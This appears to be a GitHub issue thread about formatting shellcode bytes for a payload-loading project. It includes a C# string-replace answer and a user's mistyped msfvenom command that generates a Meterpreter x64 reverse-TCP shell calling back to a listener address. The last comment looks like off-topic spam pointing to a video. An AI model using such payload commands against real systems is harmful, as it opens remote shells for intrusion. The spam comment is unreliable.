Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

removing 0x #2

Open
horllste opened this issue Jul 14, 2017 · 4 comments
Open

removing 0x #2

horllste opened this issue Jul 14, 2017 · 4 comments

Comments

@horllste
Copy link

Hello, thanks for sharing this great knowledge, i want to ask if there is a way to automate the removal of 0x in the generated payload like below

0xfc , 0x48 , 0x83 “ to fc,48,83

thanks

@DamonMohammadbagher
Copy link
Owner

in your code you should do something like this
string s = "0xfc,0x48,0x83“.Replace("0x", "");
now your s == " fc,48,83"

@horllste
Copy link
Author

root@sect:~# msfvenom --platfoem windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f c > payload.txt
Error: Invalid option
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

@horllste
Copy link
Author

okay, got the payload generation, i will try it and post back here.

@Hancock888
Copy link

Hancock888 commented Apr 29, 2019

This help me fix error 0x48 see video :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants